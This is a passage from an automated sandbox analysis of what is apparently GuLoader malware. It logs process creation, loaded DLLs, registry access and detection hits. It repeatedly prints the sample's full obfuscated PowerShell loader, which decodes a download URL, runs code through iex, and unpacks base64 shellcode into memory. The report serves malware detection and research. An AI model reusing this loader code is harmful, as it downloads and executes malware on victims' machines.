EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLedJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLedJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2411714026.0000000002F7F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb.ene source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdbeW: source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regno", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000005.00000002.2423592720.000000000C494000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2423205589.0000000008930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2415922796.0000000005C82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Unresourceful)$global:Evaporerende = [System.Text.Encoding]::ASCII.GetString($Stamherrers)$global:Reviling=$Evaporerende.substring(295973,28447)<#Sangbgers Snkningsomraade Ultrametam
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Malvastrum $Ukorrekthedens $neutralisationer), (slushing @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Udlgningens = [AppDomain]::CurrentDomain.GetAssemb
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forskubbe)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Statcoulomb, $false).DefineType($Urationel, $Sl
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Unresourceful)$global:Evaporerende = [System.Text.Encoding]::ASCII.GetString($Stamherrers)$global:Reviling=$Evaporerende.substring(295973,28447)<#Sangbgers Snkningsomraade Ultrametam
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ 